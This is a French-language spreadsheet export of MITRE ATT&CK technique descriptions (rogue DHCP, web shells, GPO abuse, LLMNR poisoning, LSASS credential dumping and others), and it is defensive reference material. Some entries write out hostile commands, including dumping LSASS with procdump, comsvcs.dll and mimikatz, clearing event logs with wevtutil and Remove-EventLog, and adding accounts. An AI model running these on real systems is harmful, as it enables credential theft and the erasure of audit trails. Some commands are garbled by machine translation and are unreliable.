DHCP est basé sur un modèle client-serveur et dispose de deux fonctionnalités : un protocole permettant de fournir des paramètres de configuration réseau d’un serveur DHCP à un client et un mécanisme d’attribution d’adresses réseau aux clients. (Citation : rfc2131) L’interaction serveur-client typique est la suivante : 
1. Le client diffuse un message « DISCOVER ».
2. Le serveur répond par un message « OFFER », qui comprend une adresse réseau disponible. 
3. Le client diffuse un message « REQUEST », qui inclut l’adresse réseau proposée. 
4. Le serveur accuse réception avec un message « ACK » et le client reçoit les paramètres de configuration du réseau.
Les adversaires peuvent se faire passer pour un serveur DHCP malveillant sur le réseau victime, à partir duquel des hôtes légitimes peuvent recevoir des configurations réseau malveillantes. Par exemple, les logiciels malveillants peuvent agir comme un serveur DHCP et fournir des serveurs DNS appartenant à l’adversaire aux ordinateurs victimes. (Référence : new_rogue_DHCP_serv_malware)(Citation : w32.tidserv.g) Grâce à des configurations réseau malveillantes, un adversaire peut atteindre la position AiTM, acheminer le trafic client via des systèmes contrôlés par l’adversaire et collecter des informations à partir du réseau client.
Les clients DHCPv6 peuvent recevoir des informations de configuration réseau sans qu’une adresse IP ne leur soit attribuée en envoyant un message &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; à l’adresse &lt;code&gt;de multidiffusion All_DHCP_Relay_Agents_and_Servers&lt;/code&gt;. (Citation : rfc3315) Les adversaires peuvent utiliser leur serveur DHCP non autorisé pour répondre à ce message de demande avec des configurations réseau malveillantes.
Plutôt que d’établir une position AiTM, les adversaires peuvent également abuser de l’usurpation DHCP pour effectuer une attaque d’épuisement DHCP (c’est-à-dire [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) en générant de nombreux messages DISCOVER de diffusion pour épuiser le pool d’allocation DHCP d’un réseau.
https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent prendre le contrôle de sessions préexistantes avec des services à distance pour se déplacer latéralement dans un environnement. Les utilisateurs peuvent utiliser des informations d’identification valides pour se connecter à un service spécialement conçu pour accepter des connexions à distance, tel que telnet, SSH et RDP. Lorsqu’un utilisateur se connecte à un service, une session est établie qui lui permet de maintenir une interaction continue avec ce service.
Les adversaires peuvent réquisitionner ces sessions pour effectuer des actions sur des systèmes distants. [Détournement de session de service à distance](https://attack.mitre.org/techniques/T1563) diffère de l’utilisation des [Services à distance](https://attack.mitre.org/techniques/T1021) car il détourne une session existante plutôt que de créer une nouvelle session à l’aide de [Comptes valides](https://attack.mitre.org/techniques/T1078). (Citation : Support de détournement RDP)(Citation : Violation Post-mortem SSH Hijack)
https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le remplissage binaire pour ajouter des données indésirables et modifier la représentation sur disque des logiciels malveillants. Cela peut être fait sans affecter la fonctionnalité ou le comportement d’un fichier binaire, mais peut augmenter la taille du fichier binaire au-delà de ce que certains outils de sécurité sont capables de gérer en raison des limitations de taille de fichier. 
Le remplissage binaire modifie efficacement la somme de contrôle du fichier et peut également être utilisé pour éviter les listes de blocage basées sur le hachage et les signatures antivirus statiques. (Citation : ESET OceanLotus) Le remplissage utilisé est généralement généré par une fonction permettant de créer des données indésirables, puis ajouté à la fin ou appliqué à des sections de logiciels malveillants. (Citation : Securelist Malware Tricks avril 2017) L’augmentation de la taille des fichiers peut réduire l’efficacité de certains outils et capacités de détection qui ne sont pas conçus ou configurés pour analyser des fichiers volumineux. Cela peut également réduire la probabilité d’être prélevé à des fins d’analyse. Les services d’analyse de fichiers publics, tels que VirusTotal, limitent la taille maximale d’un fichier téléchargé à analyser. (Citation : FAQ de VirusTotal)
https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent détourner des serveurs Web à l’aide d’interpréteurs Web pour établir un accès persistant aux systèmes. Un Web shell est un script Web qui est placé sur un serveur Web librement accessible pour permettre à un adversaire d’accéder au serveur Web en tant que passerelle vers un réseau. Un Web shell peut fournir un ensemble de fonctions à exécuter ou une interface de ligne de commande sur le système qui héberge le serveur Web. (Référence : volexity_0day_sophos_FW)
En plus d’un script côté serveur, un Web Shell peut avoir un programme d’interface client utilisé pour communiquer avec le serveur Web (par exemple, [China Chopper](https://attack.mitre.org/software/S0020) Web Shell client). (Référence : Lee 2013)
https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les objets de stratégie de groupe (GPO) pour contourner les contrôles d’accès discrétionnaires prévus pour un domaine, généralement dans le but d’élever les privilèges sur le domaine. La stratégie de groupe permet une gestion centralisée des paramètres de l’utilisateur et de l’ordinateur dans Active Directory (AD). Les GPO sont des conteneurs pour les paramètres de stratégie de groupe composés de fichiers stockés dans un chemin réseau prévisible '\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\'.( Citation : Principes de base de la politique de groupe TechNet (Citation : ADSecurity GPO Persistence 2016) 
À l’instar d’autres objets dans AD, les objets de stratégie de groupe sont associés à des contrôles d’accès. Par défaut, tous les comptes d’utilisateur du domaine sont autorisés à lire les objets de stratégie de groupe. Il est possible de déléguer des autorisations de contrôle d’accès GPO, par exemple l’accès en écriture, à des utilisateurs ou à des groupes spécifiques du domaine.
Les modifications malveillantes d’un objet de stratégie de groupe peuvent être utilisées pour implémenter de nombreux autres comportements malveillants tels que [Tâche/Travail planifié](https://attack.mitre.org/techniques/T1053), [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001), [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105), [Créer un compte](https://attack.mitre.org/techniques/T1136), [Exécution de service](https://attack.mitre.org/techniques/T1569/002), etc. (Citation : ADSecurity GPO Persistence 2016)(Citation : Guide Wald0 sur les GPO)(Citation : harmj0y abusant des autorisations GPO)(Citation : Mandiant M Trends 2016)(Citation : Violation de l’équipe de piratage de Microsoft) Étant donné que les GPO peuvent contrôler un grand nombre de paramètres d’utilisateur et de machine dans l’environnement AD, il existe un grand nombre d’attaques potentielles qui peuvent découler de cet abus GPO. (Citation : Guide Wald0 sur les GPO)
Par exemple, les scripts disponibles publiquement, tels que &lt;code&gt;New-GPOImmediateTask&lt;/code&gt;, peuvent être exploités pour automatiser la création d’une [tâche/tâche planifiée](https://attack.mitre.org/techniques/T1053) malveillante en modifiant les paramètres GPO, dans ce cas en modifiant &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;. (Citation : Guide Wald0 sur les GPO)(Citation : harmj0y abusant des autorisations GPO) Dans certains cas, un adversaire peut modifier des droits d’utilisateur spécifiques tels que SeEnableDelegationPrivilege, définis dans &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, pour obtenir une porte dérobée AD subtile avec un contrôle total du domaine, car le compte d’utilisateur sous le contrôle de l’adversaire serait alors en mesure de modifier les GPO. (citation : Harmj0y SeEnableDelegationPrivilege Right)
https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des informations sur les navigateurs pour en savoir plus sur les environnements compromis. Les données enregistrées par les navigateurs (telles que les signets, les comptes et l’historique de navigation) peuvent révéler diverses informations personnelles sur les utilisateurs (par exemple, les sites bancaires, les relations/intérêts, les médias sociaux, etc.) ainsi que des détails sur les ressources du réseau interne telles que les serveurs, les outils/tableaux de bord ou d’autres infrastructures connexes. (Citation : Kaspersky Autofill)
Les informations du navigateur peuvent également mettre en évidence d’autres cibles après qu’un adversaire a accès à des informations d’identification valides, en particulier [Informations d’identification dans les fichiers](https://attack.mitre.org/techniques/T1552/001) associées aux connexions mises en cache par un navigateur.
Les emplacements de stockage spécifiques varient en fonction de la plate-forme et/ou de l’application, mais les informations du navigateur sont généralement stockées dans des fichiers et des bases de données locaux (par exemple, ' %APPDATA %/Google/Chrome'). (Citation : Profils d’itinérance Chrome)
https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des fichiers de certificat de clé privée sur des systèmes compromis pour trouver des informations d’identification stockées de manière non sécurisée. Les clés et certificats cryptographiques privés sont utilisés pour l’authentification, le chiffrement/déchiffrement et les signatures numériques. (Citation : Wikipédia Clé publique Crypto) Les extensions de fichier de clé et de certificat courantes sont les suivantes : .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Les adversaires peuvent également rechercher dans des répertoires de clés courants, tels que &lt;code&gt;~/.ssh&lt;/code&gt; pour les clés SSH sur les systèmes basés sur * nix ou &lt;code&gt;C :\Users\(username)\.ssh\&lt;/code&gt; sur Windows. Les outils malveillants peuvent également rechercher dans les systèmes compromis des extensions de fichiers relatives aux clés cryptographiques et aux certificats. (Référence : Kaspersky Careto)(Citation : Palo Alto, prince de Perse)
Lorsqu’un périphérique est enregistré auprès d’Entra ID, une clé de périphérique et une clé de transport sont générées et utilisées pour vérifier l’identité du périphérique. (Citation : Jeton d’actualisation primaire Microsoft) Un adversaire ayant accès à l’appareil peut être en mesure d’exporter les clés afin d’usurper l’identité de l’appareil. (Citation : AADInternals Azure AD Device Identities)
Sur les périphériques réseau, les clés privées peuvent être exportées via des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'crypto pki export'. (Référence : cisco_deploy_rsa_keys) 
Certaines clés privées nécessitent un mot de passe ou une phrase de passe pour fonctionner, de sorte qu’un adversaire peut également utiliser [Capture d’entrée](https://attack.mitre.org/techniques/T1056) pour l’enregistrement de frappe ou tenter de [Force brute](https://attack.mitre.org/techniques/T1110) la phrase de passe hors ligne. Ces clés privées peuvent être utilisées pour s’authentifier auprès des [Services à distance](https://attack.mitre.org/techniques/T1021) comme SSH ou pour déchiffrer d’autres fichiers collectés tels que des e-mails.
https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer, louer ou obtenir des serveurs physiques qui peuvent être utilisés lors du ciblage. L’utilisation de serveurs permet à un adversaire de mettre en scène, de lancer et d’exécuter une opération. Au cours des activités post-compromission, les adversaires peuvent utiliser des serveurs pour diverses tâches, telles que les opérations de point d’eau dans [Compromission intempestive](https://attack.mitre.org/techniques/T1189), l’activation des opérations [Phishing](https://attack.mitre.org/techniques/T1566) ou la facilitation de la [Commande et contrôle](https://attack.mitre.org/tactics/TA0011). Au lieu de compromettre un [serveur](https://attack.mitre.org/techniques/T1584/004) tiers ou de louer un [serveur privé virtuel](https://attack.mitre.org/techniques/T1583/003), les adversaires peuvent choisir de configurer et d’exécuter leurs propres serveurs pour soutenir les opérations. Les périodes d’essai gratuites des serveurs cloud peuvent également être utilisées de manière abusive. (Citation : Essai gratuit PurpleUrchin)(Citation : Freejacked) 
Les adversaires peuvent n’avoir besoin d’une configuration légère que si la plupart de leurs activités se déroulent à l’aide d’une infrastructure en ligne. Ils peuvent également avoir besoin de construire une infrastructure étendue s’ils souhaitent tester, communiquer et contrôler d’autres aspects de leurs activités sur leurs propres systèmes. (Citation : NYTStuxnet)
https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec des systèmes distants à l’aide de Windows Remote Management (WinRM). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
WinRM est le nom d’un service Windows et d’un protocole qui permet à un utilisateur d’interagir avec un système distant (par exemple, exécuter un exécutable, modifier le registre, modifier des services). (Citation : Microsoft WinRM) Il peut être appelé avec la commande 'winrm' ou par n’importe quel nombre de programmes tels que PowerShell. (Citation : Jacobsen 2014) WinRM peut être utilisé comme méthode d’interaction à distance avec [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Référence : MSDN WMI)
https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exfiltrer des données via Bluetooth plutôt que via le canal de commande et de contrôle. Si le réseau de commande et de contrôle est une connexion Internet câblée, un adversaire peut choisir d’exfiltrer des données à l’aide d’un canal de communication Bluetooth.
Les adversaires peuvent choisir de le faire s’ils disposent d’un accès et d’une proximité suffisants. Les connexions Bluetooth peuvent ne pas être sécurisées ou défendues aussi bien que le canal principal connecté à Internet, car il n’est pas acheminé via le même réseau d’entreprise.
https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir et abuser des identifiants d’un compte par défaut comme moyen d’obtenir l’accès initial, la persistance, l’élévation de privilèges ou l’évasion de la défense. Les comptes par défaut sont ceux qui sont intégrés à un système d’exploitation, tels que les comptes Invité ou Administrateur sur les systèmes Windows. Les comptes par défaut incluent également les comptes d’usine/de fournisseur par défaut sur d’autres types de systèmes, de logiciels ou d’appareils, y compris le compte d’utilisateur racine dans AWS et le compte de service par défaut dans Kubernetes. (Citation : Comptes locaux Microsoft février 2019)(citation : utilisateur racine AWS)(Citation : Matrice des menaces pour Kubernetes)
Les comptes par défaut ne sont pas limités aux ordinateurs clients, mais incluent également des comptes prédéfinis pour des équipements tels que des périphériques réseau et des applications informatiques, qu’ils soient internes, open source ou commerciaux. Les appliances prédéfinies avec une combinaison de nom d’utilisateur et de mot de passe constituent une menace sérieuse pour les entreprises qui ne les modifient pas après l’installation, car elles sont des cibles faciles pour un adversaire. De même, les adversaires peuvent également utiliser des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou des documents d’identification divulgués publiquement ou volés pour se connecter légitimement à des environnements distants via des [services à distance](https://attack.mitre.org/techniques/T1021). (Citation : Module SSH Metasploit)
https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fournisseurs de temps pour exécuter des DLL au démarrage du système. Le service de temps Windows (W32Time) permet la synchronisation de l’heure entre les domaines et au sein de ceux-ci. (Citation : Microsoft W32Time février 2018) Les fournisseurs de temps W32Time sont chargés de récupérer les horodatages des ressources matérielles/réseau et de transmettre ces valeurs à d’autres clients du réseau. (Citation : Microsoft TimeProvider)
Les fournisseurs de temps sont implémentés sous forme de bibliothèques de liens dynamiques (DLL) qui sont enregistrées dans les sous-clés de 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\'. (Citation : Microsoft TimeProvider) Le gestionnaire de fournisseurs de temps, dirigé par le gestionnaire de contrôle de service, charge et démarre les fournisseurs de temps répertoriés et activés sous cette clé au démarrage du système et/ou chaque fois que les paramètres sont modifiés. (Citation : Microsoft TimeProvider)
Les adversaires peuvent abuser de cette architecture pour établir la persistance, en particulier en créant une nouvelle sous-clé nommée arbitrairement pointant vers une DLL malveillante dans la valeur « DllName ». Des privilèges d’administrateur sont requis pour l’inscription du fournisseur de temps, mais l’exécution s’exécute dans le contexte du compte du service local. (Citation : github w32time octobre 2017)
https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance en exécutant du contenu malveillant déclenché par un signal d’interruption. La commande &lt;code&gt;trap&lt;/code&gt; permet aux programmes et aux shells de spécifier des commandes qui seront exécutées lors de la réception de signaux d’interruption. Une situation courante est un script permettant de terminer et de gérer en douceur les interruptions de clavier courantes telles que &lt;code&gt;ctrl+c&lt;/code&gt; et &lt;code&gt;ctrl+d&lt;/code&gt;.
Les adversaires peuvent l’utiliser pour enregistrer le code à exécuter lorsque l’interpréteur rencontre des interruptions spécifiques en tant que mécanisme de persistance. Les commandes d’interruption sont de format suivant : &lt;code&gt;piéger les signaux 'liste de commandes'&lt;/code&gt; où la « liste de commandes » sera exécutée lorsque des « signaux » sont reçus. (Citation : Manuel des pièges)(Citation : Cyberciti Trap Statements)
https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les variables d’environnement que l’éditeur de liens dynamiques utilise pour charger des bibliothèques partagées. Au cours de la phase de préparation de l’exécution d’un programme, l’éditeur de liens dynamique charge les chemins absolus spécifiés des bibliothèques partagées à partir de variables et de fichiers d’environnement, tels que &lt;code&gt;LD_PRELOAD&lt;/code&gt; sous Linux ou &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; sous macOS. Les bibliothèques spécifiées dans les variables d’environnement sont chargées en premier, ce qui a la priorité sur les bibliothèques système portant le même nom de fonction. (Citation : Man LD.SO)(Citation : Bibliothèques partagées TLDP)(Citation : Bibliothèques dynamiques d’archives Apple Doco) Ces variables sont souvent utilisées par les développeurs pour déboguer des fichiers binaires sans avoir à recompiler, désamorcer les conflits entre les symboles mappés et implémenter des fonctions personnalisées sans modifier la bibliothèque d’origine. (Référence : Baeldung LD_PRELOAD)
Sous Linux et macOS, le détournement des variables de l’éditeur de liens dynamiques peut accorder l’accès à la mémoire du processus victime, aux ressources système/réseau et éventuellement à des privilèges élevés. Cette méthode peut également échapper à la détection des produits de sécurité puisque l’exécution est masquée par un processus légitime. Les adversaires peuvent définir des variables d’environnement via la ligne de commande à l’aide de la commande &lt;code&gt;export&lt;/code&gt;, de la fonction &lt;code&gt;setenv&lt;/code&gt; ou de la fonction &lt;code&gt;putenv&lt;/code&gt;. Les adversaires peuvent également tirer parti du [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) pour exporter des variables dans un shell ou définir des variables par programmation à l’aide d’une syntaxe de niveau supérieur telle que &lt;code&gt;os.environnement&lt;/code&gt; de Python.
Sous Linux, les adversaires peuvent configurer &lt;code&gt;LD_PRELOAD&lt;/code&gt; pour qu’ils pointent vers des bibliothèques malveillantes qui correspondent au nom de bibliothèques légitimes demandées par un programme victime, ce qui oblige le système d’exploitation à charger le code malveillant de l’adversaire lors de l’exécution du programme victime. &lt;code&gt;LD_PRELOAD&lt;/code&gt; peut être défini via la variable d’environnement ou le fichier &lt;code&gt;/etc/ld.so.preload&lt;/code&gt;. (Citation : Man LD.SO)(Citation : Bibliothèques partagées TLDP) Les bibliothèques spécifiées par &lt;code&gt;LD_PRELOAD&lt;/code&gt; sont chargées et mappées en mémoire par &lt;code&gt;dlopen()&lt;/code&gt; et &lt;code&gt;mmap()&lt;/code&gt; respectivement. (Citation : Injection de code sur Linux et macOS)(Citation : Aiguille non informée) (Citation : Phrack à moitié mort 1997)(Citation : Brown exploitant les linkers) 
Sur macOS, ce comportement est conceptuellement le même que sur Linux, ne différant que par la façon dont les bibliothèques dynamiques macOS (dyld) sont implémentées à un niveau inférieur. Les adversaires peuvent définir la variable &lt;code&gt;d’environnement DYLD_INSERT_LIBRARIES&lt;/code&gt; pour qu’elle pointe vers des bibliothèques malveillantes contenant des noms de bibliothèques légitimes ou des fonctions demandées par un programme victime. (Citation : TheEvilBit DYLD_INSERT_LIBRARIES)(Référence : Timac DYLD_INSERT_LIBRARIES)(Citation : Gabilondo DYLD_INSERT_LIBRARIES contournement de Catalina)
https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un compte local pour maintenir l’accès aux systèmes des victimes. Les comptes locaux sont ceux configurés par une organisation pour une utilisation par les utilisateurs, le support à distance, les services ou pour l’administration sur un système ou un service unique. 
Par exemple, avec un niveau d’accès suffisant, la commande Windows &lt;code&gt;net user /add&lt;/code&gt; peut être utilisée pour créer un compte local. Sur les systèmes macOS, la commande &lt;code&gt;dscl -create&lt;/code&gt; peut être utilisée pour créer un compte local. Des comptes locaux peuvent également être ajoutés aux périphériques réseau, souvent via des commandes courantes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que le &lt;code&gt;nom d’utilisateur&lt;/code&gt;, ou à des clusters Kubernetes à l’aide de l’utilitaire 'kubectl'. (Référence : cisco_username_cmd)(Citation : Sécurité des comptes de service Kubernetes)
Ces comptes peuvent être utilisés pour établir un accès secondaire authentifié qui ne nécessite pas le déploiement d’outils d’accès à distance persistants sur le système.
https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des commandes et des contrôles entre des hôtes compromis sur des réseaux potentiellement déconnectés à l’aide de supports amovibles pour transférer des commandes d’un système à l’autre. (Citation : ESET Sednit USBStealer 2014) Les deux systèmes devraient être compromis, avec la probabilité qu’un système connecté à Internet ait été compromis en premier et le second par un mouvement latéral par [Réplication via un support amovible](https://attack.mitre.org/techniques/T1091). Les commandes et les fichiers seraient relayés du système déconnecté au système connecté à Internet auquel l’adversaire a un accès direct.
https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer les journaux d’événements Windows pour masquer l’activité d’une intrusion. Les journaux d’événements Windows sont un enregistrement des alertes et des notifications d’un ordinateur. Il existe trois sources d’événements définies par le système : Système, Application et Sécurité, avec cinq types d’événements : Erreur, Avertissement, Information, Audit de réussite et Audit d’échec.
Avec les privilèges d’administrateur, les journaux d’événements peuvent être effacés à l’aide des commandes utilitaires suivantes :
* &lt;code&gt;Système Wevtutil CL&lt;/code&gt;
* &lt;code&gt;Wevtutil CL Application&lt;/code&gt;
* &lt;code&gt;Wevtutil CL Sécurité&lt;/code&gt;
Ces journaux peuvent également être effacés par d’autres mécanismes, tels que l’interface graphique de l’observateur d’événements ou [PowerShell](https://attack.mitre.org/techniques/T1059/001). Par exemple, les adversaires peuvent utiliser la commande PowerShell &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; pour supprimer le Security EventLog et, après le redémarrage, désactiver la journalisation future.  Remarque : des événements peuvent toujours être générés et enregistrés dans le fichier .evtx entre l’exécution de la commande et le redémarrage. (Référence : disable_win_evt_logging)
Les adversaires peuvent également tenter d’effacer les journaux en supprimant directement les fichiers journaux stockés dans 'C :\Windows\System32\winevt\logs\'.
https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des comptes de messagerie qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes créés auprès de fournisseurs de messagerie pour poursuivre leurs opérations, par exemple en les exploitant pour effectuer des [hameçonnages contre des informations](https://attack.mitre.org/techniques/T1598) ou des [hameçonnages](https://attack.mitre.org/techniques/T1566). (Référence : Mandiant APT1) La création de comptes de messagerie peut également permettre à des adversaires d’abuser de services gratuits, tels que des périodes d’essai, pour [Acquérir une infrastructure](https://attack.mitre.org/techniques/T1583) à des fins de suivi. (Citation : Essai gratuit PurpleUrchin)
Les adversaires peuvent également prendre des mesures pour cultiver un personnage autour du compte de messagerie, par exemple en utilisant des [comptes de médias sociaux](https://attack.mitre.org/techniques/T1585/001), afin d’augmenter les chances de succès des comportements de suivi. Les comptes de messagerie créés peuvent également être utilisés dans l’acquisition d’infrastructures (ex : [Domaines](https://attack.mitre.org/techniques/T1583/001)). (Référence : Mandiant APT1)
Pour réduire le risque de lier physiquement les opérations à eux-mêmes, les adversaires peuvent utiliser des services de messagerie jetables. (Citation : Trend Micro R980 2016)
https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>En répondant au trafic réseau LLMNR/NBT-NS, les adversaires peuvent usurper une source faisant autorité pour la résolution de noms afin de forcer la communication avec un système contrôlé par l’adversaire. Cette activité peut être utilisée pour collecter ou relayer des documents d’authentification. 
La résolution de noms de multidiffusion locale (LLMNR) et le service de noms NetBIOS (NBT-NS) sont des composants Microsoft Windows qui servent d’autres méthodes d’identification de l’hôte. LLMNR est basé sur le format DNS (Domain Name System) et permet aux hôtes sur la même liaison locale d’effectuer la résolution de noms pour d’autres hôtes. NBT-NS identifie les systèmes d’un réseau local par leur nom NetBIOS. (Citation : Wikipédia LLMNR)(Citation : TechNet NetBIOS)
Les adversaires peuvent usurper une source faisant autorité pour la résolution de noms sur un réseau victime en répondant au trafic LLMNR (UDP 5355)/NBT-NS (UDP 137) comme s’ils connaissaient l’identité de l’hôte demandé, empoisonnant ainsi le service afin que les victimes communiquent avec le système contrôlé par l’adversaire. Si l’hôte demandé appartient à une ressource qui nécessite une identification/authentification, le nom d’utilisateur et le hachage NTLMv2 seront alors envoyés au système contrôlé par l’adversaire. L’adversaire peut ensuite collecter les informations de hachage envoyées sur le réseau à l’aide d’outils qui surveillent les ports pour le trafic ou via [Network Sniffing](https://attack.mitre.org/techniques/T1040) et craquer les hachages hors ligne via [Brute Force](https://attack.mitre.org/techniques/T1110) pour obtenir les mots de passe en texte brut.
Dans certains cas où un adversaire a accès à un système qui se trouve dans le chemin d’authentification entre les systèmes ou lorsque des analyses automatisées qui utilisent des informations d’identification tentent de s’authentifier auprès d’un système contrôlé par l’adversaire, les hachages NTLMv1/v2 peuvent être interceptés et relayés pour accéder à un système cible et exécuter du code sur celui-ci. Le pas de relais peut se produire en conjonction avec un empoisonnement, mais peut aussi en être indépendant. (Citation : byt3bl33d3r Relais NTLM)(Citation : Secure Ideas SMB Relay) De plus, les adversaires peuvent encapsuler les hachages NTLMv1/v2 dans divers protocoles, tels que LDAP, SMB, MSSQL et HTTP, afin d’étendre et d’utiliser plusieurs services avec la réponse NTLM valide. 
Plusieurs outils peuvent être utilisés pour empoisonner les services de noms au sein des réseaux locaux, tels que NBNSpoof, Metasploit et [Responder](https://attack.mitre.org/software/S0174). (Citation : GitHub NBNSpoof)(Citation : Rapid7 LLMNR Spoofer)(Citation : GitHub Responder)
https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les autorisations/attributs de fichiers ou de répertoires pour contourner les listes de contrôle d’accès (ACL) et accéder aux fichiers protégés. (Citation : Hybrid Analysis Icacls1 juin 2018)(Citation : Analyse hybride Icacls2 mai 2018) Les autorisations de fichiers et de répertoires sont généralement gérées par des listes de contrôle d’accès configurées par le propriétaire du fichier ou du répertoire, ou par les utilisateurs disposant des autorisations appropriées. Les implémentations de listes de contrôle d’accès de fichiers et de répertoires varient selon la plate-forme, mais désignent généralement explicitement quels utilisateurs ou groupes peuvent effectuer quelles actions (lecture, écriture, exécution, etc.).
Les modifications peuvent inclure la modification de droits d’accès spécifiques, ce qui peut nécessiter la prise en charge d’un fichier ou d’un répertoire et/ou des autorisations élevées en fonction des autorisations existantes du fichier ou du répertoire. Cela peut permettre des activités malveillantes telles que la modification, le remplacement ou la suppression de fichiers ou de répertoires spécifiques. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flux](https://attack.mitre.org/techniques/T1574).
Les adversaires peuvent également modifier les autorisations des liens symboliques. Par exemple, les logiciels malveillants (en particulier les ransomwares) peuvent modifier les liens symboliques et les paramètres associés pour permettre l’accès aux fichiers à partir de raccourcis locaux avec des chemins d’accès distants. (Citation : new_rust_based_ransomware)(Référence : bad_luck_blackcat)(Référence : falconoverwatch_blackcat_attack)(Référence : blackmatter_blackcat)(Référence : fsutil_behavior)
https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder aux informations d’identification stockées dans la mémoire de processus du service LSASS (Local Security Authority Subsystem Service). Une fois qu’un utilisateur s’est connecté, le système génère et stocke divers éléments d’identification dans la mémoire de processus LSASS. Ces éléments d’identification peuvent être collectés par un utilisateur administratif ou un SYSTEM et utilisés pour effectuer [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) à l’aide de [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550).
En plus des techniques en mémoire, la mémoire de processus LSASS peut être vidée de l’hôte cible et analysée sur un système local.
Par exemple, sur l’hôte cible, utilisez procdump :
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Localement, mimikatz peut être exécuté en utilisant :
* &lt;code&gt;sekurlsa ::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa ::logonPasswords&lt;/code&gt;
Des outils Windows intégrés tels que 'comsvcs.dll' peuvent également être utilisés :
* &lt;code&gt;rundll32.exe C :\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full&lt;/code&gt;(Citation : Volexity Exchange Marauder March 2021)(Citation : Symantec Attacks Against Government Sector)
À l’instar de [Injection d’options d’exécution de fichier image](https://attack.mitre.org/techniques/T1546/012), le mécanisme de sortie de processus silencieux peut être utilisé de manière abusive pour créer un vidage de mémoire de 'lsass.exe' via le rapport d’erreurs Windows ('WerFault.exe'). (Citation : Deep Instinct LSASS)
Les DLL SSP (Security Security Support Provider) Windows sont chargées dans le processus LSASS au démarrage du système. Une fois chargées dans le LSA, les DLL SSP ont accès aux mots de passe chiffrés et en texte brut qui sont stockés dans Windows, tels que le mot de passe de domaine ou les codes confidentiels de carte à puce de tout utilisateur connecté. La configuration SSP est stockée dans deux clés de registre : &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; et &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. Un adversaire peut modifier ces clés de registre pour ajouter de nouveaux SSP, qui seront chargés au prochain démarrage du système ou lors de l’appel de la fonction d’API Windows AddSecurityPackage. (Citation : Graeber 2014)
Les SSP suivants peuvent être utilisés pour accéder aux informations d’identification :
* Msv : les ouvertures de session interactives, les ouvertures de session par lots et les ouvertures de session de service sont effectuées via le package d’authentification MSV.
* Wdigest : Le protocole d’authentification Digest est conçu pour être utilisé avec les échanges HTTP (Hypertext Transfer Protocol) et SASL (Simple Authentication Security Layer). (Citation : Protection des informations d’identification des blogs TechNet)
